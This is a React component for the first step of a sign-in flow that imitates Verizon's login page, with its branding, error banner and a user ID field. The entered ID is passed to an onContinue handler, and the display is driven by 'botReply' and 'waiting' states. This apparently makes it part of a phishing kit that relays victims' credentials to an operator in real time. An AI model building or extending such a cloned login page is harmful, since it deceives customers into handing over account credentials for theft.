import React, { useState } from "react";
import s from "./stepStyles";

export default function Step1({ onContinue, botReply, waiting }) {
  const [userId, setUserId] = useState("");

  return (
    <div class="">
      {botReply == "empty" && (
        <div style={s.warningDiv}>
          <span style={s.warningIcon}>
            <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEsAAABLCAYAAAA4TnrqAAAACXBIWXMAAC4jAAAuIwF4pT92AAADGklEQVR4nO3c/VXDIBAA8KML6AgdwRGygW5g3aAjtBu4gXWDukFH0A0coU5wvlR4+igkfBzcQbz38kfbGMivJFJyAIjIvgHAGgAOAHAGAPyznfX7axH1FAC1s4B8227RWLrVhECZ7bBIrAQodrDWoFjBpEEdAWDQ+w36tRgwSVAbz99spICJhpIGJh5KElgTUFLAmoGSANYUFDdYc1CcYE1CcYE1C8UB1jRUbbDmoWqCdQFVC0zpQpJCKTVCPXr+9gkRD6HHVUqt9YipHZ+I+BlxnBHsxfPxKyJukk9YSouaGDGNHiEt1cJWKcCULapE6PKfPId+1PWPjmgs6VAmSoBFYbUCZYIaLBirNSgTlGBBWK1CmaACm8VqHcoEBdgkVi9QJnLBvFi9QZnIAXNi9QplIhXsCqt3KBNJYFJ+FAPA1lPuVsqPbxFQ+PsE2lX2UKHsIDCz81TaT63xKDasALCd3ucyLMI+HjVRj2qJbDNg66nLr+rAna7sVT0Y6uADOyidinhj3fffEPGB6j9PaCilrkYiEVEx1GPM3rm33v5aOaDGeK5ULzs+Zl7XCtf53zg7pYh4YqrkeeZ1lfCdv68HP3BUUkr4zn/E+nK8v2Wqt/2NcrVw1/lf7llHxwf3+inJ4kKft31zH+O40h1SV7wsDWzmMdrO9C3Ye/Do7sVX6b0HdEh/evB/dpbwCJ4FK+q3oRQwALizyryTAnWFJQRsMJskKCeWBLAaW8oj/in1bsFScyHmDtodWE7SyGzKUa0xeaXUeHO/dXx0RsR3ojLy0pECv40a2ccnz/FP3C0q6DKsCVYSiypfK7bQkhMBimBRJralFF4ErAQWdQZgaiVKzMkhxSqRKpnTvKlzSsmwSuWUSspWJuk6iMxWLnlJZtSlaB48VSX/Z1i0AtbU3B1OsCZnhXGANT3fsCZYFzNZa4B1NUe6JFiXs+9LgHW9rgMl2CJWDKEAW9RaNDlgi1zlKBDsf/2sSLCQbRkrsxGAsa35lzRHmiL0uNJr5KHyxqMygw0LfsH2gbvvOaEuwdWkrUtS/gq4iPANPmSEdRHI41sAAAAASUVORK5CYII=" width="25"></img>
          </span>
          <div class="">
            <p style={s.warningTextHead}>
            We don't recognize your information.</p>
            <p style={s.warningText}>
              Make sure you're signing in with your
              registered profile details. You can also sign in to a{" "}
              <span style={s.warningLink}>disconnected mobile account</span> or{" "}
              <span style={s.warningLink}>business account</span>.
            </p>
          </div>
        </div>
        )}
      <div style={s.card}>
        <h2 style={s.title}>Sign in</h2>
        <p style={s.subtitle}>
          New customer?{" "}
          <span style={s.link}>Create new account</span>
          <br></br>
          <br></br>
        </p>

        <label style={s.label}>User ID or Verizon mobile number</label>
        <input
          style={s.input}
          type="text"
          value={userId}
          onChange={(e) => setUserId(e.target.value)}
          autoFocus
        />
        <p style={s.hint}>If you're a Home customer, enter your user ID.</p>

        <div style={s.forgotRow}>
          <br></br><br></br>

          <span style={s.link}>Forgot user ID or password</span>
        </div>

        

        <button
          style={userId.trim() ? s.btnActive : s.btnDisabled}
          disabled={!userId.trim() || waiting}
          onClick={() => onContinue({ "User ID / Mobile": userId })}
        >
          {waiting ? "Please wait..." : "Continue"}
        </button>
      </div>
    </div>
  );
}
